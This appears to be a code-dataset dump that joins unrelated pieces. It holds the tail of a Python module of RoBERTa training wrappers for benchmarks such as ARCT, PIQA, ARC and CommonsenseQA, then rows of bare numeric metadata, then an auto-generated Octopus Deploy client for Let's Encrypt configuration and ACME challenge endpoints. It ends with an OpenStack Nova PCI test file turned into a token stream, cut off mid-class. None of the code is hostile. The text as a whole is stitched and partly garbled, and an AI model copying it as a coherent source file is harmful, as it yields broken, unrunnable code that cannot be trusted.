    """
    hparams = Namespace(
        learning_rate=learning_rate,
        gradient_accumulation_steps=gradient_accumulation_steps,
        seed=seed,
        model_name=model_name,
        batch_size=batch_size,
        max_seq_len=max_seq_len,
        weight_decay=weight_decay,
        warmup_ratio=warmup_ratio,
    )
    seed_everything(hparams.seed)
    # Keyword arguments shared by fresh construction and checkpoint restore.
    model_kwargs = {
        "epochs": epochs,
        "lr_schedule": lr_schedule,
        "num_classes": num_classes,
    }
    if data_path is not _MISSING:
        model_kwargs["data_path"] = data_path
    if load_from_checkpoint is None:
        roberta = model_cls(hparams, **model_kwargs)
    else:
        roberta = model_cls.load_from_checkpoint(
            load_from_checkpoint,
            hparams=hparams,
            **model_kwargs,
        )
    # Keep the k best checkpoints by validation loss.
    checkpoint_callback = ModelCheckpoint(
        filepath=os.path.join(checkpoint_path, roberta_name + "_{epoch:02d}"),
        save_top_k=save_top_k,
        monitor="Loss/Validation",
        mode="min",
    )
    logger = TensorBoardLogger(log_path, name=roberta_name)
    kwargs = dict()
    if hparams.gradient_accumulation_steps:
        kwargs["accumulate_grad_batches"] = hparams.gradient_accumulation_steps
    if use_early_stop:
        kwargs["callbacks"] = [
            EarlyStopping(
                monitor=early_stop_metric,
                patience=early_stop_patience,
                mode=early_stop_mode,
            )
        ]
    trainer = Trainer(
        max_epochs=epochs,
        logger=logger,
        checkpoint_callback=checkpoint_callback,
        gpus=1,
        **kwargs
    )
    if do_train:
        LOG.info("Starting training")
        trainer.fit(roberta)
    if do_test:
        LOG.info("Starting testing")
        trainer.test(roberta)


def train_and_eval_binary_arct(
    do_train,
    do_test,
    load_from_checkpoint,
    epochs,
    learning_rate,
    weight_decay,
    lr_schedule,
    warmup_ratio,
    gradient_accumulation_steps,
    seed,
    model_name,
    batch_size,
    max_seq_len,
    data_path,
    log_path,
    checkpoint_path,
    save_top_k,
    use_early_stop,
    early_stop_metric,
    early_stop_patience,
    early_stop_mode,
):
    """Train/evaluate ``RobertaForBinaryARCT`` (binary ARCT, 2 classes)."""
    _train_and_eval(
        RobertaForBinaryARCT,
        "Roberta-For-Binary-ARCT",
        2,
        do_train,
        do_test,
        load_from_checkpoint,
        epochs,
        learning_rate,
        weight_decay,
        lr_schedule,
        warmup_ratio,
        gradient_accumulation_steps,
        seed,
        model_name,
        batch_size,
        max_seq_len,
        log_path,
        checkpoint_path,
        save_top_k,
        use_early_stop,
        early_stop_metric,
        early_stop_patience,
        early_stop_mode,
        data_path=data_path,
    )


def train_and_eval_arct(
    do_train,
    do_test,
    load_from_checkpoint,
    epochs,
    learning_rate,
    weight_decay,
    lr_schedule,
    warmup_ratio,
    gradient_accumulation_steps,
    seed,
    model_name,
    batch_size,
    max_seq_len,
    data_path,
    log_path,
    checkpoint_path,
    save_top_k,
    use_early_stop,
    early_stop_metric,
    early_stop_patience,
    early_stop_mode,
):
    """Train/evaluate ``RobertaForARCT`` (ARCT, 2 classes)."""
    _train_and_eval(
        RobertaForARCT,
        "Roberta-For-ARCT",
        2,
        do_train,
        do_test,
        load_from_checkpoint,
        epochs,
        learning_rate,
        weight_decay,
        lr_schedule,
        warmup_ratio,
        gradient_accumulation_steps,
        seed,
        model_name,
        batch_size,
        max_seq_len,
        log_path,
        checkpoint_path,
        save_top_k,
        use_early_stop,
        early_stop_metric,
        early_stop_patience,
        early_stop_mode,
        data_path=data_path,
    )


def train_and_eval_piqa(
    do_train,
    do_test,
    load_from_checkpoint,
    epochs,
    learning_rate,
    weight_decay,
    lr_schedule,
    warmup_ratio,
    gradient_accumulation_steps,
    seed,
    model_name,
    batch_size,
    max_seq_len,
    data_path,
    log_path,
    checkpoint_path,
    save_top_k,
    use_early_stop,
    early_stop_metric,
    early_stop_patience,
    early_stop_mode,
):
    """Train/evaluate ``RobertaForPIQA`` (PIQA, 2 classes)."""
    _train_and_eval(
        RobertaForPIQA,
        "Roberta-For-PIQA",
        2,
        do_train,
        do_test,
        load_from_checkpoint,
        epochs,
        learning_rate,
        weight_decay,
        lr_schedule,
        warmup_ratio,
        gradient_accumulation_steps,
        seed,
        model_name,
        batch_size,
        max_seq_len,
        log_path,
        checkpoint_path,
        save_top_k,
        use_early_stop,
        early_stop_metric,
        early_stop_patience,
        early_stop_mode,
        data_path=data_path,
    )


def train_and_eval_mc_piqa(
    do_train,
    do_test,
    load_from_checkpoint,
    epochs,
    learning_rate,
    weight_decay,
    lr_schedule,
    warmup_ratio,
    gradient_accumulation_steps,
    seed,
    model_name,
    batch_size,
    max_seq_len,
    data_path,
    log_path,
    checkpoint_path,
    save_top_k,
    use_early_stop,
    early_stop_metric,
    early_stop_patience,
    early_stop_mode,
):
    """Train/evaluate ``RobertaForMultipleChoicePIQA`` (MC PIQA, 2 classes)."""
    _train_and_eval(
        RobertaForMultipleChoicePIQA,
        "Roberta-For-MC-PIQA",
        2,
        do_train,
        do_test,
        load_from_checkpoint,
        epochs,
        learning_rate,
        weight_decay,
        lr_schedule,
        warmup_ratio,
        gradient_accumulation_steps,
        seed,
        model_name,
        batch_size,
        max_seq_len,
        log_path,
        checkpoint_path,
        save_top_k,
        use_early_stop,
        early_stop_metric,
        early_stop_patience,
        early_stop_mode,
        data_path=data_path,
    )


def train_and_eval_arc(
    do_train,
    do_test,
    load_from_checkpoint,
    epochs,
    learning_rate,
    weight_decay,
    lr_schedule,
    warmup_ratio,
    gradient_accumulation_steps,
    seed,
    model_name,
    batch_size,
    max_seq_len,
    log_path,
    checkpoint_path,
    save_top_k,
    use_early_stop,
    early_stop_metric,
    early_stop_patience,
    early_stop_mode,
):
    """Train/evaluate ``RobertaForARC`` (ARC, 5 classes; no data_path)."""
    _train_and_eval(
        RobertaForARC,
        "Roberta-For-ARC",
        5,
        do_train,
        do_test,
        load_from_checkpoint,
        epochs,
        learning_rate,
        weight_decay,
        lr_schedule,
        warmup_ratio,
        gradient_accumulation_steps,
        seed,
        model_name,
        batch_size,
        max_seq_len,
        log_path,
        checkpoint_path,
        save_top_k,
        use_early_stop,
        early_stop_metric,
        early_stop_patience,
        early_stop_mode,
    )


def train_and_eval_ranking_arc(
    do_train,
    do_test,
    load_from_checkpoint,
    epochs,
    learning_rate,
    weight_decay,
    lr_schedule,
    warmup_ratio,
    gradient_accumulation_steps,
    seed,
    model_name,
    batch_size,
    max_seq_len,
    log_path,
    checkpoint_path,
    save_top_k,
    use_early_stop,
    early_stop_metric,
    early_stop_patience,
    early_stop_mode,
):
    """Train/evaluate ``RobertaForRankingARC`` (ranking ARC, 5 classes)."""
    _train_and_eval(
        RobertaForRankingARC,
        "Roberta-For-Ranking-ARC",
        5,
        do_train,
        do_test,
        load_from_checkpoint,
        epochs,
        learning_rate,
        weight_decay,
        lr_schedule,
        warmup_ratio,
        gradient_accumulation_steps,
        seed,
        model_name,
        batch_size,
        max_seq_len,
        log_path,
        checkpoint_path,
        save_top_k,
        use_early_stop,
        early_stop_metric,
        early_stop_patience,
        early_stop_mode,
    )


def train_and_eval_csqa(
    do_train,
    do_test,
    load_from_checkpoint,
    epochs,
    learning_rate,
    weight_decay,
    lr_schedule,
    warmup_ratio,
    gradient_accumulation_steps,
    seed,
    model_name,
    batch_size,
    max_seq_len,
    log_path,
    checkpoint_path,
    save_top_k,
    use_early_stop,
    early_stop_metric,
    early_stop_patience,
    early_stop_mode,
):
    """Train/evaluate ``RobertaForCSQA`` (CommonsenseQA, 5 classes)."""
    _train_and_eval(
        RobertaForCSQA,
        "Roberta-For-CSQA",
        5,
        do_train,
        do_test,
        load_from_checkpoint,
        epochs,
        learning_rate,
        weight_decay,
        lr_schedule,
        warmup_ratio,
        gradient_accumulation_steps,
        seed,
        model_name,
        batch_size,
        max_seq_len,
        log_path,
        checkpoint_path,
        save_top_k,
        use_early_stop,
        early_stop_metric,
        early_stop_patience,
        early_stop_mode,
    )
| 25.015408
| 79
| 0.625624
| 1,719
| 16,235
| 5.524142
| 0.0605
| 0.053075
| 0.092144
| 0.042755
| 0.929549
| 0.929549
| 0.929549
| 0.929549
| 0.929549
| 0.929549
| 0
| 0.003083
| 0.30077
| 16,235
| 648
| 80
| 25.054012
| 0.833421
| 0
| 0
| 0.841837
| 0
| 0
| 0.048845
| 0.01275
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011905
| false
| 0
| 0.011905
| 0
| 0.02381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
edb2d45a01841bd157bb8d42600f465b6e304fa9
| 13,924
|
py
|
Python
|
octopus_deploy_swagger_client/octopus_deploy_client/lets_encrypt_api.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
octopus_deploy_swagger_client/octopus_deploy_client/lets_encrypt_api.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
octopus_deploy_swagger_client/octopus_deploy_client/lets_encrypt_api.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Octopus Server API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2019.6.7+Branch.tags-2019.6.7.Sha.aa18dc6809953218c66f57eff7d26481d9b23d6a
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from octopus_deploy_swagger_client.api_client import ApiClient
class LetsEncryptApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
    def __init__(self, api_client=None):
        """Create the API wrapper.

        :param api_client: optional pre-configured ``ApiClient``; when
            omitted, a default-constructed client is used.
        """
        # Fall back to a default client when none is injected.
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client
    # Public GET dispatcher; delegates to the _with_http_info variant and
    # returns the payload only (auto-generated — do not hand-edit logic).
    def custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_get_action(self, **kwargs):  # noqa: E501
        """custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_get_action  # noqa: E501
        Returns the current Let's Encrypt configuration NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_get_action(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Always ask the low-level variant for data only, not (data, status, headers).
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            # Async: the request thread is returned; caller retrieves via .get().
            return self.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_get_action_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_get_action_with_http_info(**kwargs)  # noqa: E501
            return data
    # Low-level GET implementation (auto-generated — do not hand-edit logic).
    def custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_get_action_with_http_info(self, **kwargs):  # noqa: E501
        """custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_get_action  # noqa: E501
        Returns the current Let's Encrypt configuration NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_get_action_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Framework-level keyword arguments accepted by every generated method.
        all_params = []  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        params = locals()
        # Reject any keyword argument the endpoint does not recognise.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_get_action" % key
                )
            params[key] = val
        del params['kwargs']
        # This endpoint takes no path/query/form parameters and no body.
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader']  # noqa: E501
        # GET the configuration; response body is discarded (response_type=None).
        return self.api_client.call_api(
            'api/letsencryptconfiguration', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    # Public PUT dispatcher; delegates to the _with_http_info variant and
    # returns the payload only (auto-generated — do not hand-edit logic).
    def custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_update_action(self, **kwargs):  # noqa: E501
        """custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_update_action  # noqa: E501
        Updates the Let's Encrypt configuration used by the Octopus Server. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_update_action(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Always ask the low-level variant for data only, not (data, status, headers).
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            # Async: the request thread is returned; caller retrieves via .get().
            return self.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_update_action_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_update_action_with_http_info(**kwargs)  # noqa: E501
            return data
    # Low-level PUT implementation (auto-generated — do not hand-edit logic).
    def custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_update_action_with_http_info(self, **kwargs):  # noqa: E501
        """custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_update_action  # noqa: E501
        Updates the Let's Encrypt configuration used by the Octopus Server. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_update_action_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Framework-level keyword arguments accepted by every generated method.
        all_params = []  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        params = locals()
        # Reject any keyword argument the endpoint does not recognise.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_update_action" % key
                )
            params[key] = val
        del params['kwargs']
        # NOTE(review): despite being an *update*, no request body is sent
        # (body_params stays None) — matches the generated spec as-is.
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader']  # noqa: E501
        # PUT to the configuration endpoint; response body is discarded.
        return self.api_client.call_api(
            'api/letsencryptconfiguration', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    # Public dispatcher for the HTTP-challenge endpoint; delegates to the
    # _with_http_info variant (auto-generated — do not hand-edit logic).
    def custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder(self, token, **kwargs):  # noqa: E501
        """custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder  # noqa: E501
        Returns the computed HTTP challenge for a given token NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder(token, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str token: LetsEncrypt response token (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Always ask the low-level variant for data only, not (data, status, headers).
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            # Async: the request thread is returned; caller retrieves via .get().
            return self.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder_with_http_info(token, **kwargs)  # noqa: E501
        else:
            (data) = self.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder_with_http_info(token, **kwargs)  # noqa: E501
            return data
def custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder_with_http_info(self, token, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder # noqa: E501
Returns the computed HTTP challenge for a given token NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder_with_http_info(token, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str token: LetsEncrypt response token (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['token'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'token' is set
if ('token' not in params or
params['token'] is None):
raise ValueError("Missing the required parameter `token` when calling `custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder`") # noqa: E501
collection_formats = {}
path_params = {}
if 'token' in params:
path_params['token'] = params['token'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/.well-known/acme-challenge//{token}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 45.802632
| 202
| 0.685435
| 1,658
| 13,924
| 5.373341
| 0.112183
| 0.035021
| 0.062858
| 0.094287
| 0.914805
| 0.914805
| 0.914805
| 0.898642
| 0.894825
| 0.894825
| 0
| 0.015306
| 0.244542
| 13,924
| 303
| 203
| 45.953795
| 0.831638
| 0.384516
| 0
| 0.76129
| 1
| 0
| 0.17582
| 0.08835
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045161
| false
| 0
| 0.025806
| 0
| 0.135484
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
edc973df64528cf4245abc9265a14b35922d8654
| 90
|
py
|
Python
|
models/__init__.py
|
MikeLagunes/Supervised-Triplet-Network
|
575bcaf8f17affb0ff0e93212dde0f3f634c196f
|
[
"MIT"
] | 6
|
2019-07-07T08:48:03.000Z
|
2021-07-29T06:32:01.000Z
|
models/__init__.py
|
MikeLagunes/Supervised-Triplet-Network
|
575bcaf8f17affb0ff0e93212dde0f3f634c196f
|
[
"MIT"
] | 1
|
2019-03-11T03:28:36.000Z
|
2019-03-13T12:45:59.000Z
|
models/__init__.py
|
MikeLagunes/Supervised-Triplet-Network
|
575bcaf8f17affb0ff0e93212dde0f3f634c196f
|
[
"MIT"
] | 1
|
2022-02-09T12:48:09.000Z
|
2022-02-09T12:48:09.000Z
|
from cnn_resnet import *
from triplet_resnet import *
from triplet_resnet_softmax import *
| 30
| 36
| 0.844444
| 13
| 90
| 5.538462
| 0.461538
| 0.333333
| 0.444444
| 0.638889
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122222
| 90
| 3
| 36
| 30
| 0.911392
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
b62906204f911033c0595c5e3173a9a985340aaa
| 43,687
|
py
|
Python
|
nova/tests/unit/pci/test_manager.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/pci/test_manager.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/pci/test_manager.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | 2
|
2017-07-20T17:31:34.000Z
|
2020-07-24T02:42:19.000Z
|
begin_unit
comment|'# Copyright (c) 2012 OpenStack Foundation'
nl|'\n'
comment|'# All Rights Reserved.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'import'
name|'copy'
newline|'\n'
nl|'\n'
name|'import'
name|'mock'
newline|'\n'
name|'from'
name|'oslo_serialization'
name|'import'
name|'jsonutils'
newline|'\n'
nl|'\n'
name|'import'
name|'nova'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'compute'
name|'import'
name|'vm_states'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'context'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'objects'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'objects'
name|'import'
name|'fields'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'pci'
name|'import'
name|'manager'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'pci'
name|'import'
name|'fakes'
name|'as'
name|'pci_fakes'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
name|'import'
name|'uuidsentinel'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|variable|fake_pci
name|'fake_pci'
op|'='
op|'{'
nl|'\n'
string|"'compute_node_id'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'address'"
op|':'
string|"'0000:00:00.1'"
op|','
nl|'\n'
string|"'product_id'"
op|':'
string|"'p'"
op|','
nl|'\n'
string|"'vendor_id'"
op|':'
string|"'v'"
op|','
nl|'\n'
string|"'request_id'"
op|':'
name|'None'
op|','
nl|'\n'
string|"'status'"
op|':'
name|'fields'
op|'.'
name|'PciDeviceStatus'
op|'.'
name|'AVAILABLE'
op|','
nl|'\n'
string|"'dev_type'"
op|':'
name|'fields'
op|'.'
name|'PciDeviceType'
op|'.'
name|'STANDARD'
op|','
nl|'\n'
string|"'parent_addr'"
op|':'
name|'None'
op|','
nl|'\n'
string|"'numa_node'"
op|':'
number|'0'
op|'}'
newline|'\n'
DECL|variable|fake_pci_1
name|'fake_pci_1'
op|'='
name|'dict'
op|'('
name|'fake_pci'
op|','
name|'address'
op|'='
string|"'0000:00:00.2'"
op|','
nl|'\n'
name|'product_id'
op|'='
string|"'p1'"
op|','
name|'vendor_id'
op|'='
string|"'v1'"
op|')'
newline|'\n'
DECL|variable|fake_pci_2
name|'fake_pci_2'
op|'='
name|'dict'
op|'('
name|'fake_pci'
op|','
name|'address'
op|'='
string|"'0000:00:00.3'"
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|variable|fake_db_dev
name|'fake_db_dev'
op|'='
op|'{'
nl|'\n'
string|"'created_at'"
op|':'
name|'None'
op|','
nl|'\n'
string|"'updated_at'"
op|':'
name|'None'
op|','
nl|'\n'
string|"'deleted_at'"
op|':'
name|'None'
op|','
nl|'\n'
string|"'deleted'"
op|':'
name|'None'
op|','
nl|'\n'
string|"'id'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'compute_node_id'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'address'"
op|':'
string|"'0000:00:00.1'"
op|','
nl|'\n'
string|"'vendor_id'"
op|':'
string|"'v'"
op|','
nl|'\n'
string|"'product_id'"
op|':'
string|"'p'"
op|','
nl|'\n'
string|"'numa_node'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'dev_type'"
op|':'
name|'fields'
op|'.'
name|'PciDeviceType'
op|'.'
name|'STANDARD'
op|','
nl|'\n'
string|"'status'"
op|':'
name|'fields'
op|'.'
name|'PciDeviceStatus'
op|'.'
name|'AVAILABLE'
op|','
nl|'\n'
string|"'dev_id'"
op|':'
string|"'i'"
op|','
nl|'\n'
string|"'label'"
op|':'
string|"'l'"
op|','
nl|'\n'
string|"'instance_uuid'"
op|':'
name|'None'
op|','
nl|'\n'
string|"'extra_info'"
op|':'
string|"'{}'"
op|','
nl|'\n'
string|"'request_id'"
op|':'
name|'None'
op|','
nl|'\n'
string|"'parent_addr'"
op|':'
name|'None'
op|','
nl|'\n'
op|'}'
newline|'\n'
DECL|variable|fake_db_dev_1
name|'fake_db_dev_1'
op|'='
name|'dict'
op|'('
name|'fake_db_dev'
op|','
name|'vendor_id'
op|'='
string|"'v1'"
op|','
nl|'\n'
name|'product_id'
op|'='
string|"'p1'"
op|','
name|'id'
op|'='
number|'2'
op|','
nl|'\n'
DECL|variable|address
name|'address'
op|'='
string|"'0000:00:00.2'"
op|','
nl|'\n'
DECL|variable|numa_node
name|'numa_node'
op|'='
number|'0'
op|')'
newline|'\n'
DECL|variable|fake_db_dev_2
name|'fake_db_dev_2'
op|'='
name|'dict'
op|'('
name|'fake_db_dev'
op|','
name|'id'
op|'='
number|'3'
op|','
name|'address'
op|'='
string|"'0000:00:00.3'"
op|','
nl|'\n'
name|'numa_node'
op|'='
name|'None'
op|','
name|'parent_addr'
op|'='
string|"'0000:00:00.1'"
op|')'
newline|'\n'
DECL|variable|fake_db_devs
name|'fake_db_devs'
op|'='
op|'['
name|'fake_db_dev'
op|','
name|'fake_db_dev_1'
op|','
name|'fake_db_dev_2'
op|']'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|variable|fake_pci_requests
name|'fake_pci_requests'
op|'='
op|'['
nl|'\n'
op|'{'
string|"'count'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'spec'"
op|':'
op|'['
op|'{'
string|"'vendor_id'"
op|':'
string|"'v'"
op|'}'
op|']'
op|'}'
op|','
nl|'\n'
op|'{'
string|"'count'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'spec'"
op|':'
op|'['
op|'{'
string|"'vendor_id'"
op|':'
string|"'v1'"
op|'}'
op|']'
op|'}'
op|']'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|PciDevTrackerTestCase
name|'class'
name|'PciDevTrackerTestCase'
op|'('
name|'test'
op|'.'
